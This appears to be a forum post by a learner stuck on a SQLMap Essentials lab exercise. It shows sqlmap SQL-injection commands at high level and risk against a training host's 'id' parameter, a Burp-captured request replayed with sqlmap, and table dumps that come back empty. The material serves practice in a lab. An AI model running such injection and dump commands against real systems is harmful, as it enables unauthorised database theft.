I am stuck in sqlmap essentials. I am in the attack tuning section
for the first task I used the command
sqlmap -u 'http://94.237.49.138:56473/case5.php?id=1' --level 5 --risk 3 -T flag5 --no-cast --dump --batch
and got the table
+----+---------+
| id | cpytent |
+----+---------+
| 1 | |
+----+---------+
I then tried to capture the original request through burp and saved it to file
GET /case5.php?id=1 HTTP/1.1
Host: 94.237.56.188:32260
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.56.188:32260/case5.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
Then I used sqlmap -r req.txt --no-cast -T flag5 --batch --dump --level 5 --risk 3
Database: testdb
Table: flag5
[1 entry]
+----+-----------+
| id | conten |
+----+-----------+
| 1 | |
+----+-----------+